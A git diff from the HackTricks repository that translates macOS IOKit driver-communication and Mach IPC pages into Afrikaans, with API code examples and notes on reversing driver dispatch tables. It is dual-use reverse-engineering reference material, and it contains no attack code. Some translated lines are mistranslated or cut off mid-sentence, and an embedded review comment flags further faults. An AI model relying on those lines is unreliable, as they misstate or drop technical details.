-In IORegistryExplorer, "planes" are used to organize and display the relationships between different objects in the IORegistry. Each plane represents a specific type of relationship or a particular view of the system's hardware and driver configuration. Here are some of the common planes you might encounter in IORegistryExplorer: +In IORegistryExplorer word "vlakke" gebruik om die verhoudings tussen verskillende voorwerpe in die IORegistry te organiseer en te vertoon. Elke vlak verteenwoordig 'n spesifieke tipe verhouding of 'n spesifieke aansig van die stelsel se hardeware- en drywerkonfigurasie. Hier is 'n paar van die algemene vlakke wat jy in IORegistryExplorer mag teëkom: -1. **IOService Plane**: This is the most general plane, displaying the service objects that represent drivers and nubs (communication channels between drivers). It shows the provider-client relationships between these objects. -2. **IODeviceTree Plane**: This plane represents the physical connections between devices as they are attached to the system. It is often used to visualize the hierarchy of devices connected via buses like USB or PCI. -3. **IOPower Plane**: Displays objects and their relationships in terms of power management. It can show which objects are affecting the power state of others, useful for debugging power-related issues. -4. **IOUSB Plane**: Specifically focused on USB devices and their relationships, showing the hierarchy of USB hubs and connected devices. -5. **IOAudio Plane**: This plane is for representing audio devices and their relationships within the system. +1. **IOService-vlak**: Dit is die algemeenste vlak wat diensvoorwerpe vertoon wat drywers en nubs (kommunikasiekanale tussen drywers) voorstel. Dit toon die verskaffer-kliëntverhoudings tussen hierdie voorwerpe. +2. **IODeviceTree-vlak**: Hierdie vlak verteenwoordig die fisiese verbindings tussen toestelle soos hulle aan die stelsel gekoppel is. 
Dit word dikwels gebruik om die hiërargie van toestelle wat via busse soos USB of PCI gekoppel is, te visualiseer. +3. **IOPower-vlak**: Vertoon voorwerpe en hul verhoudings in terme van kragbestuur. Dit kan wys watter voorwerpe die kragtoestand van ander beïnvloed, wat nuttig is vir die opspoor van kragverwante probleme. +4. **IOUSB-vlak**: Spesifiek gefokus op USB-toestelle en hul verhoudings, wat die hiërargie van USB-hubs en gekoppelde toestelle vertoon. +5. **IOAudio-vlak**: Hierdie vlak is vir die verteenwoordiging van klanktoestelle en hul verhoudings binne die stelsel. 6. ... -## Driver Comm Code Example +## Voorbeeld van drywerkommunikasiekode -The following code connects to the IOKit service `"YourServiceNameHere"` and calls the function inside the selector 0. For it: - -* it first calls **`IOServiceMatching`** and **`IOServiceGetMatchingServices`** to get the service. -* It then establish a connection calling **`IOServiceOpen`**. -* And it finally calls a function with **`IOConnectCallScalarMethod`** indicating the selector 0 (the selector is the number the function you want to call has assigned). +Die volgende kode maak verbinding met die IOKit-diens `"YourServiceNameHere"` en roep die funksie binne die selektor 0 aan. Hiervoor: +* roep dit eers **`IOServiceMatching`** en **`IOServiceGetMatchingServices`** aan om die diens te kry. +* Dit vestig dan 'n verbinding deur **`IOServiceOpen`** te roep. +* En dit roep uiteindelik 'n funksie aan met **`IOConnectCallScalarMethod`** wat die selektor 0 aandui (die selektor is die nommer wat aan die funksie wat jy wil oproep, toegeken is). 
```objectivec #import #import int main(int argc, const char * argv[]) { - @autoreleasepool { - // Get a reference to the service using its name - CFMutableDictionaryRef matchingDict = IOServiceMatching("YourServiceNameHere"); - if (matchingDict == NULL) { - NSLog(@"Failed to create matching dictionary"); - return -1; - } - - // Obtain an iterator over all matching services - io_iterator_t iter; - kern_return_t kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter); - if (kr != KERN_SUCCESS) { - NSLog(@"Failed to get matching services"); - return -1; - } - - // Get a reference to the first service (assuming it exists) - io_service_t service = IOIteratorNext(iter); - if (!service) { - NSLog(@"No matching service found"); - IOObjectRelease(iter); - return -1; - } - - // Open a connection to the service - io_connect_t connect; - kr = IOServiceOpen(service, mach_task_self(), 0, &connect); - if (kr != KERN_SUCCESS) { - NSLog(@"Failed to open service"); - IOObjectRelease(service); - IOObjectRelease(iter); - return -1; - } - - // Call a method on the service - // Assume the method has a selector of 0, and takes no arguments - kr = IOConnectCallScalarMethod(connect, 0, NULL, 0, NULL, NULL); - if (kr != KERN_SUCCESS) { - NSLog(@"Failed to call method"); - } - - // Cleanup - IOServiceClose(connect); - IOObjectRelease(service); - IOObjectRelease(iter); - } - return 0; +@autoreleasepool { +// Get a reference to the service using its name +CFMutableDictionaryRef matchingDict = IOServiceMatching("YourServiceNameHere"); +if (matchingDict == NULL) { +NSLog(@"Failed to create matching dictionary"); +return -1; +} + +// Obtain an iterator over all matching services +io_iterator_t iter; +kern_return_t kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter); +if (kr != KERN_SUCCESS) { +NSLog(@"Failed to get matching services"); +return -1; +} + +// Get a reference to the first service (assuming it exists) +io_service_t service = 
IOIteratorNext(iter); +if (!service) { +NSLog(@"No matching service found"); +IOObjectRelease(iter); +return -1; +} + +// Open a connection to the service +io_connect_t connect; +kr = IOServiceOpen(service, mach_task_self(), 0, &connect); +if (kr != KERN_SUCCESS) { +NSLog(@"Failed to open service"); +IOObjectRelease(service); +IOObjectRelease(iter); +return -1; +} + +// Call a method on the service +// Assume the method has a selector of 0, and takes no arguments +kr = IOConnectCallScalarMethod(connect, 0, NULL, 0, NULL, NULL); +if (kr != KERN_SUCCESS) { +NSLog(@"Failed to call method"); +} + +// Cleanup +IOServiceClose(connect); +IOObjectRelease(service); +IOObjectRelease(iter); +} +return 0; } ``` +Daar is **ander** funksies wat gebruik kan word om IOKit funksies aan te roep, afgesien van **`IOConnectCallScalarMethod`** soos **`IOConnectCallMethod`**, **`IOConnectCallStructMethod`**... -There are **other** functions that can be used to call IOKit functions apart of **`IOConnectCallScalarMethod`** like **`IOConnectCallMethod`**, **`IOConnectCallStructMethod`**... +## Omkeer van bestuurder se intreepunt -## Reversing driver entrypoint +Jy kan dit byvoorbeeld verkry vanaf 'n [**firmware-beeld (ipsw)**](./#ipsw). Laai dit dan in jou gunsteling dekompiler. -You could obtain these for example from a [**firmware image (ipsw)**](./#ipsw). Then, load it into your favourite decompiler. - -You could start decompiling the **`externalMethod`** function as this is the driver function that will be receiving the call and calling the correct function: +Jy kan begin dekompilering van die **`externalMethod`** funksie aangesien dit die bestuursfunksie is wat die oproep sal ontvang en die korrekte funksie sal aanroep:
-That awful call demagled means: +Daardie afgryslike oproep beteken: {% code overflow="wrap" %} ```cpp @@ -193,7 +181,7 @@ IOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArguments ``` {% endcode %} -Note how in the previous definition the **`self`** param is missed, the good definition would be: +Let op hoe in die vorige definisie die **`self`** parameter weggelaat is, die goeie definisie sou wees: {% code overflow="wrap" %} ```cpp @@ -201,58 +189,56 @@ IOUserClient2022::dispatchExternalMethod(self, unsigned int, IOExternalMethodArg ``` {% endcode %} -Actually, you can find the real definition in [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388): - +Eintlik kan jy die werklike definisie vind by [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388): ```cpp IOUserClient2022::dispatchExternalMethod(uint32_t selector, IOExternalMethodArgumentsOpaque *arguments, - const IOExternalMethodDispatch2022 dispatchArray[], size_t dispatchArrayCount, - OSObject * target, void * reference) +const IOExternalMethodDispatch2022 dispatchArray[], size_t dispatchArrayCount, +OSObject * target, void * reference) ``` - -With this info you can rewrite Ctrl+Right -> `Edit function signature` and set the known types: +Met hierdie inligting kan jy Ctrl+Right herskryf -> `Wysig funksie handtekening` en stel die bekende tipes in:
-The new decompiled code will look like: +Die nuwe gedekomponeerde kode sal lyk soos:
-For the next step we need to have defined the **`IOExternalMethodDispatch2022`** struct. It's opensource in [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176), you could define it: +Vir die volgende stap moet ons die **`IOExternalMethodDispatch2022`** struktuur gedefinieer hê. Dit is oopbron in [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176), jy kan dit definieer:
-Now, following the `(IOExternalMethodDispatch2022 *)&sIOExternalMethodArray` you can see a lot of data: +Nou, volgens die `(IOExternalMethodDispatch2022 *)&sIOExternalMethodArray` kan jy baie data sien:
-Change the Data Type to **`IOExternalMethodDispatch2022:`** +Verander die Data Tipe na **`IOExternalMethodDispatch2022:`**
-after the change: +na die verandering:
-And as we now in there we have an **array of 7 elements** (check the final decompiled code), click to create an array of 7 elements: +En soos ons nou weet, het ons 'n **array van 7 elemente** (kontroleer die finale gedekomponeerde kode), klik om 'n array van 7 elemente te skep:
-After the array is created you can see all the exported functions: +Nadat die array geskep is, kan jy al die uitgevoerde funksies sien:
{% hint style="success" %} -If you remember, to **call** an **exported** function from user space we don't need to call the name of the function, but the **selector number**. Here you can see that the selector **0** is the function **`initializeDecoder`**, the selector **1** is **`startDecoder`**, the selector **2** **`initializeEncoder`**... +As jy onthou, om 'n uitgevoerde funksie vanuit gebruikersruimte te **roep**, hoef ons nie die naam van die funksie te noem nie, maar die **selekteernommer**. Hier kan jy sien dat die selekteerder **0** die funksie **`initializeDecoder`** is, die selekteerder **1** is **`startDecoder`**, die selekteerder **2** is **`initializeEncoder`**... {% endhint %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **laaste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS- en HackTricks-swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegramgroep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). 
+* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
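Review bot: in the `@@ -201,58` hunk the Ghidra menu label `Edit function signature` has been translated to `Wysig funksie handtekening`; UI strings, like code identifiers, should stay in English so the reader can locate the actual menu entry. The same hunk drops the continuation indentation of the xnu `dispatchExternalMethod` signature (the `-` lines for `const IOExternalMethodDispatch2022 dispatchArray[]` and `OSObject * target` are indented, the `+` lines are flush left); contents of code fences should be copied verbatim, only the prose needs translating. Also `demagled` (demangled) is lost in `Daardie afgryslike oproep beteken`, so the sentence no longer says that what follows is the demangled form of the call.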
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md index be63575e5..45a398eff 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md @@ -1,119 +1,115 @@ -# macOS IPC - Inter Process Communication +# macOS IPC - Interproses Kommunikasie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Mach messaging via Ports +## Mach-boodskappe via Poorte -### Basic Information +### Basiese Inligting -Mach uses **tasks** as the **smallest unit** for sharing resources, and each task can contain **multiple threads**. These **tasks and threads are mapped 1:1 to POSIX processes and threads**. +Mach gebruik **take** as die **kleinste eenheid** vir die deel van hulpbronne, en elke taak kan **veral threads** bevat. Hierdie **take en threads word 1:1 gekarteer na POSIX-prosesse en threads**. -Communication between tasks occurs via Mach Inter-Process Communication (IPC), utilising one-way communication channels. **Messages are transferred between ports**, which act like **message queues** managed by the kernel. +Kommunikasie tussen take vind plaas via Mach Inter-Process Communication (IPC), wat eenrigting kommunikasiekanale gebruik. **Boodskappe word oorgedra tussen poorte**, wat optree as **boodskap-ueue** wat deur die kernel bestuur word. -Each process has an **IPC table**, in there it's possible to find the **mach ports of the process**. The name of a mach port is actually a number (a pointer to the kernel object). +Elke proses het 'n **IPC-tabel**, waarin dit moontlik is om die **mach-poorte van die proses** te vind. Die naam van 'n mach-poort is eintlik 'n nommer ( 'n verwysing na die kernel-objek). -A process can also send a port name with some rights **to a different task** and the kernel will make this entry in the **IPC table of the other task** appear. +'n Proses kan ook 'n poortnaam met sekere regte **na 'n ander taak stuur** en die kernel sal hierdie inskrywing in die **IPC-tabel van die ander taak** laat verskyn. -### Port Rights +### Poortregte -Port rights, which define what operations a task can perform, are key to this communication. 
The possible **port rights** are ([definitions from here](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)): +Poortregte, wat bepaal watter operasies 'n taak kan uitvoer, is sleutel tot hierdie kommunikasie. Die moontlike **poortregte** is ([definisies van hier](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)): -* **Receive right**, which allows receiving messages sent to the port. Mach ports are MPSC (multiple-producer, single-consumer) queues, which means that there may only ever be **one receive right for each port** in the whole system (unlike with pipes, where multiple processes can all hold file descriptors to the read end of one pipe). - * A **task with the Receive** right can receive messages and **create Send rights**, allowing it to send messages. Originally only the **own task has Receive right over its por**t. -* **Send right**, which allows sending messages to the port. - * The Send right can be **cloned** so a task owning a Send right can clone the right and **grant it to a third task**. -* **Send-once right**, which allows sending one message to the port and then disappears. -* **Port set right**, which denotes a _port set_ rather than a single port. Dequeuing a message from a port set dequeues a message from one of the ports it contains. Port sets can be used to listen on several ports simultaneously, a lot like `select`/`poll`/`epoll`/`kqueue` in Unix. -* **Dead name**, which is not an actual port right, but merely a placeholder. When a port is destroyed, all existing port rights to the port turn into dead names. +* **Ontvangsreg**, wat die ontvangs van boodskappe wat na die poort gestuur is, moontlik maak. Mach-poorte is MPSC (veelvuldige produsent, enkelverbruiker)ueue, wat beteken dat daar slegs **een ontvangsreg vir elke poort** in die hele stelsel kan wees (in teenstelling met pype, waar verskeie prosesse almal lêerbeskrywers na die leesuiteinde van een pyp kan hê). 
+* 'n **Taak met die Ontvangsreg** kan boodskappe ontvang en **Sendregte skep**, wat dit moontlik maak om boodskappe te stuur. Aanvanklik het slegs die **eie taak Ontvangsreg oor sy poort**. +* **Sendreg**, wat dit moontlik maak om boodskappe na die poort te stuur. +* Die Sendreg kan **gekloneer** word sodat 'n taak wat 'n Sendreg besit, die reg kan kloon en **aan 'n derde taak kan toeken**. +* **Send-once-reg**, wat dit moontlik maak om een boodskap na die poort te stuur en dan te verdwyn. +* **Poortstelreg**, wat 'n _poortstel_ aandui eerder as 'n enkele poort. Deur 'n boodskap uit 'n poortstel te ontkoppel, word 'n boodskap uit een van die poorte wat dit bevat, ontkoppel. Poortstelle kan gebruik word om gelyktydig na verskeie poorte te luister, soos `select`/`poll`/`epoll`/`kqueue` in Unix. +* **Dooie naam**, wat nie 'n werklike poortreg is nie, maar bloot 'n plasinghouer. Wanneer 'n poort vernietig word, verander alle bestaande poortregte na die poort in dooie name. -**Tasks can transfer SEND rights to others**, enabling them to send messages back. **SEND rights can also be cloned, so a task can duplicate and give the right to a third task**. This, combined with an intermediary process known as the **bootstrap server**, allows for effective communication between tasks. +**Take kan SEND-regte aan ander oordra**, sodat hulle boodskappe kan terugstuur. **SEND-regte kan ook gekloneer word**, sodat 'n taak die reg kan dupliseer en aan 'n derde taak kan gee. Dit, saam met 'n tussenliggende proses wat bekend staan as die **bootstrap-bediener**, maak effektiewe kommunikasie tussen take moontlik. -### Establishing a communication +### Die vestiging van 'n kommunikasie -#### Steps: +#### Stappe: -As it's mentioned, in order to establish the communication channel, the **bootstrap server** (**launchd** in mac) is involved. +Soos genoem, is die **bootstrap-bediener** (**launchd** in Mac) betrokke by die vestiging van die kommunikasiekanaal. -1. 
Task **A** initiates a **new port**, obtaining a **RECEIVE right** in the process. -2. Task **A**, being the holder of the RECEIVE right, **generates a SEND right for the port**. -3. Task **A** establishes a **connection** with the **bootstrap server**, providing the **port's service name** and the **SEND right** through a procedure known as the bootstrap register. -4. Task **B** interacts with the **bootstrap server** to execute a bootstrap **lookup for the service** name. If successful, the **server duplicates the SEND right** received from Task A and **transmits it to Task B**. -5. Upon acquiring a SEND right, Task **B** is capable of **formulating** a **message** and dispatching it **to Task A**. -6. For a bi-directional communication usually task **B** generates a new port with a **RECEIVE** right and a **SEND** right, and gives the **SEND right to Task A** so it can send messages to TASK B (bi-directional communication). +1. Taak **A** begin 'n **nuwe poort** en verkry 'n **ONTVANG-reg** in die proses. +2. Taak **A**, as die houer van die ONTVANG-reg, **genereer 'n SEND-reg vir die poort**. +3. Taak **A** vestig 'n **verbinding** met die **bootstrap-bediener**, deur die **diensnaam van die poort** en die **SEND-reg** te voorsien deur middel van 'n prosedure wat bekend staan as die bootstrap-registrasie. +4. Taak **B** interaksie met die **bootstrap-bediener** om 'n bootstrap **soektog na die diensnaam** uit te voer. As dit suksesvol is, **dupliseer die bediener die ontvangde SEND-reg** van Taak A en **stuur dit na Taak B**. +5. Nadat Taak **B** 'n SEND-reg bekom het, is dit in staat om 'n **boodskap te formuleer** en dit **na Taak A** te stuur. +6. Vir 'n tweerigtingkommunikasie genereer taak **B** gewoonlik 'n nuwe poort met 'n **ONTVANG-reg** en 'n **SEND-reg**, en gee die **SEND-reg aan Taak A** sodat dit boodskappe na Taak B kan stuur (tweerigtingkommunikasie). -The bootstrap server **cannot authenticate** the service name claimed by a task. 
This means a **task** could potentially **impersonate any system task**, such as falsely **claiming an authorization service name** and then approving every request. +Die bootstrap-bediener kan die diensnaam wat deur 'n taak beweer word, **nie outentiseer nie**. Dit beteken dat 'n **taak potensieel enige stelseltaak kan naboots**, soos valse **bewering van 'n outorisasiediensnaam** en dan elke versoek goedkeur. -Then, Apple stores the **names of system-provided services** in secure configuration files, located in **SIP-protected** directories: `/System/Library/LaunchDaemons` and `/System/Library/LaunchAgents`. Alongside each service name, the **associated binary is also stored**. The bootstrap server, will create and hold a **RECEIVE right for each of these service names**. +Apple stoor dan die **name van stelselverskafte dienste** in veilige konfigurasie lêers, wat in **SIP-beskermde** gids: `/System/Library/LaunchDaemons` en `/System/Library/LaunchAgents`, geleë is. Saam met elke diensnaam word die **geassosieerde binêre lêer ook gestoor**. Die bootstrap-bediener sal vir elkeen van hierdie diensname 'n **ONTVANG-reg skep en behou**. -For these predefined services, the **lookup process differs slightly**. When a service name is being looked up, launchd starts the service dynamically. The new workflow is as follows: +Vir hierdie voorgedefinieerde dienste verskil die **soektogproses effens**. Wanneer 'n diensnaam opgesoek word, begin launchd die diens dinamies. Die nuwe werkstroom is as volg: -* Task **B** initiates a bootstrap **lookup** for a service name. -* **launchd** checks if the task is running and if it isn’t, **starts** it. -* Task **A** (the service) performs a **bootstrap check-in**. Here, the **bootstrap** server creates a SEND right, retains it, and **transfers the RECEIVE right to Task A**. -* launchd duplicates the **SEND right and sends it to Task B**. 
-* Task **B** generates a new port with a **RECEIVE** right and a **SEND** right, and gives the **SEND right to Task A** (the svc) so it can send messages to TASK B (bi-directional communication). +* Taak **B** begin 'n bootstrap **soektog** vir 'n diensnaam. +* **launchd** kyk of die taak loop en as dit nie is nie, **begin** dit dit. +* Taak **A** (die diens) voer 'n **bootstrap check-in** uit. Hier skep die **bootstrap**-bediener 'n SEND-reg, behou dit, en **oorhandig die ONTVANG-reg aan Taak A**. +* launchd dupliseer die **SEND-reg en stuur dit na Taak B**. +* Taak **B** genereer 'n nuwe poort met 'n **ONTVANG-reg** en 'n **SEND-reg**, en gee die **SEND-reg aan Taak A** (die diens) sodat dit boodskappe na Taak B kan stuur (tweerigtingkommunikasie). -However, this process only applies to predefined system tasks. Non-system tasks still operate as described originally, which could potentially allow for impersonation. +Hierdie proses geld egter slegs vir voorgedefinieerde stelseltake. Nie-stelsel take werk steeds soos oorspronklik beskryf, wat potensieel die moontlikheid van nabootsing toelaat. -### A Mach Message +### 'n Mach-boodskap -[Find more info here](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) - -The `mach_msg` function, essentially a system call, is utilized for sending and receiving Mach messages. The function requires the message to be sent as the initial argument. This message must commence with a `mach_msg_header_t` structure, succeeded by the actual message content. The structure is defined as follows: +[Vind meer inligting hier](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) +Die `mach_msg`-funksie, essensieel 'n stelseloproep, word gebruik om Mach-boodskappe te stuur en te ontvang. 
Die funksie vereis dat die boodskap as die aan ```c typedef struct { - mach_msg_bits_t msgh_bits; - mach_msg_size_t msgh_size; - mach_port_t msgh_remote_port; - mach_port_t msgh_local_port; - mach_port_name_t msgh_voucher_port; - mach_msg_id_t msgh_id; +mach_msg_bits_t msgh_bits; +mach_msg_size_t msgh_size; +mach_port_t msgh_remote_port; +mach_port_t msgh_local_port; +mach_port_name_t msgh_voucher_port; +mach_msg_id_t msgh_id; } mach_msg_header_t; ``` +Prosesse wat 'n _**ontvangsreg**_ besit, kan boodskappe op 'n Mach-poort ontvang. Omgekeerd word aan die **senders** 'n _**stuur**_ of 'n _**stuur-eenmaal-reg**_ toegeken. Die stuur-eenmaal-reg is slegs vir die stuur van 'n enkele boodskap, waarna dit ongeldig word. -Processes possessing a _**receive right**_ can receive messages on a Mach port. Conversely, the **senders** are granted a _**send**_ or a _**send-once right**_. The send-once right is exclusively for sending a single message, after which it becomes invalid. - -In order to achieve an easy **bi-directional communication** a process can specify a **mach port** in the mach **message header** called the _reply port_ (**`msgh_local_port`**) where the **receiver** of the message can **send a reply** to this message. The bitflags in **`msgh_bits`** can be used to **indicate** that a **send-once** **right** should be derived and transferred for this port (`MACH_MSG_TYPE_MAKE_SEND_ONCE`). +Om 'n maklike **tweerigting-kommunikasie** te bewerkstellig, kan 'n proses 'n **mach-poort** in die mach **boodskapkop** spesifiseer wat die _antwoordpoort_ (**`msgh_local_port`**) genoem word, waar die **ontvanger** van die boodskap 'n antwoord na hierdie boodskap kan stuur. Die bitvlaggies in **`msgh_bits`** kan gebruik word om aan te dui dat 'n **stuur-eenmaal-reg** afgelei en oorgedra moet word vir hierdie poort (`MACH_MSG_TYPE_MAKE_SEND_ONCE`). 
{% hint style="success" %} -Note that this kind of bi-directional communication is used in XPC messages that expect a replay (`xpc_connection_send_message_with_reply` and `xpc_connection_send_message_with_reply_sync`). But **usually different ports are created** as explained previously to create the bi-directional communication. +Let daarop dat hierdie soort tweerigting-kommunikasie gebruik word in XPC-boodskappe wat 'n antwoord verwag (`xpc_connection_send_message_with_reply` en `xpc_connection_send_message_with_reply_sync`). Maar **gewoonlik word verskillende poorte geskep** soos vantevore verduidelik om die tweerigting-kommunikasie te skep. {% endhint %} -The other fields of the message header are: +Die ander velde van die boodskapkop is: -* `msgh_size`: the size of the entire packet. -* `msgh_remote_port`: the port on which this message is sent. -* `msgh_voucher_port`: [mach vouchers](https://robert.sesek.com/2023/6/mach\_vouchers.html). -* `msgh_id`: the ID of this message, which is interpreted by the receiver. +* `msgh_size`: die grootte van die hele pakkie. +* `msgh_remote_port`: die poort waarop hierdie boodskap gestuur word. +* `msgh_voucher_port`: [mach-vouchers](https://robert.sesek.com/2023/6/mach\_vouchers.html). +* `msgh_id`: die ID van hierdie boodskap, wat deur die ontvanger geïnterpreteer word. {% hint style="danger" %} -Note that **mach messages are sent over a **_**mach port**_, which is a **single receiver**, **multiple sender** communication channel built into the mach kernel. **Multiple processes** can **send messages** to a mach port, but at any point only **a single process can read** from it. +Let daarop dat **mach-boodskappe oor 'n **_**mach-poort**_ gestuur word, wat 'n **enkele ontvanger**, **veelvuldige sender**-kommunikasiekanaal is wat in die mach-kernel ingebou is. **Veelvuldige prosesse** kan **boodskappe stuur** na 'n mach-poort, maar op enige punt kan slegs **'n enkele proses** dit lees. 
{% endhint %} -### Enumerate ports - +### Enumereer poorte ```bash lsmp -p ``` +Jy kan hierdie instrument in iOS installeer deur dit af te laai vanaf [http://newosxbook.com/tools/binpack64-256.tar.gz](http://newosxbook.com/tools/binpack64-256.tar.gz) -You can install this tool in iOS downloading it from [http://newosxbook.com/tools/binpack64-256.tar.gz ](http://newosxbook.com/tools/binpack64-256.tar.gz) +### Kodevoorbeeld -### Code example - -Note how the **sender** **allocates** a port, create a **send right** for the name `org.darlinghq.example` and send it to the **bootstrap server** while the sender asked for the **send right** of that name and used it to **send a message**. +Merk op hoe die **sender** 'n poort toewys, 'n **send right** skep vir die naam `org.darlinghq.example` en dit na die **bootstrap server** stuur terwyl die sender die **send right** van daardie naam gevra het en dit gebruik het om 'n boodskap te stuur. {% tabs %} {% tab title="receiver.c" %} 
@@ -127,64 +123,107 @@ Note how the **sender** **allocates** a port, create a **send right** for the na int main() { - // Create a new port. - mach_port_t port; - kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); - if (kr != KERN_SUCCESS) { - printf("mach_port_allocate() failed with code 0x%x\n", kr); - return 1; - } - printf("mach_port_allocate() created port right name %d\n", port); +// Create a new port. +mach_port_t port; +kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); +if (kr != KERN_SUCCESS) { +printf("mach_port_allocate() failed with code 0x%x\n", kr); +return 1; +} +printf("mach_port_allocate() created port right name %d\n", port); - // Give us a send right to this port, in addition to the receive right. - kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); - if (kr != KERN_SUCCESS) { - printf("mach_port_insert_right() failed with code 0x%x\n", kr); - return 1; - } - printf("mach_port_insert_right() inserted a send right\n"); +// Give us a send right to this port, in addition to the receive right. +kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); +if (kr != KERN_SUCCESS) { +printf("mach_port_insert_right() failed with code 0x%x\n", kr); +return 1; +} +printf("mach_port_insert_right() inserted a send right\n"); - // Send the send right to the bootstrap server, so that it can be looked up by other processes. - kr = bootstrap_register(bootstrap_port, "org.darlinghq.example", port); - if (kr != KERN_SUCCESS) { - printf("bootstrap_register() failed with code 0x%x\n", kr); - return 1; - } - printf("bootstrap_register()'ed our port\n"); +// Send the send right to the bootstrap server, so that it can be looked up by other processes. 
